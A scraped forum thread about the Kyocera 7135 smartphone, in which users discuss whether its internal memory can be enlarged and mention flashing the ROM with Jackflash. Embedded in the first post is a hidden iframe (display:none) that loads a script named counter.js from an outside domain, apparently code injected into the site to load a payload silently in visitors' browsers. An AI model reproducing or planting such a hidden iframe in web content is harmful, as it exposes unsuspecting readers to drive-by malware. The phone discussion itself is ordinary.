+ Reply to Thread

7135 Memory (Internal)

I recently read a review of the 7135 where the owner had the internal memory increased. Anyone know how or where to do this? I have over 1500 contacts and it is very slooow to find anything.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    perhaps he used jackflash or something like that where it allows you access to the ROM of the phone.

there is not any conventional way to increase your internal memory capacity, thats why you have the sd slot for the memory card!

Originally posted by marctronixx
    perhaps he used jackflash or something like that where it allows you access to the ROM of the phone.

there is not any conventional way to increase your internal memory capacity, thats why you have the sd slot for the memory card!
    Yep. Back when I had the 6035 and was choking on the 8MB of RAM, I thought about screwing around with the ROM side, but thought better of it (or maybe was just too lazy to pursue the idea). Now with the virtually unlimited storage potential of the 7135 (and the ability to restore on the fly) I can't think of any good reasons to modify what is in ROM.
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    Now with the virtually unlimited storage potential of the 7135 (and the ability to restore on the fly) I can't think of any good reasons to modify what is in ROM.
    ITA. I kept ROM filled via Jackflash with my m505 but I don't see a need at this point. Actually, I hope that Kyocera will come out with new software which can be flashed at Verizon. T9, a better Mp3 player, new Eudora, a EIS replacement, and TAKEphONE could fill up any free ROM.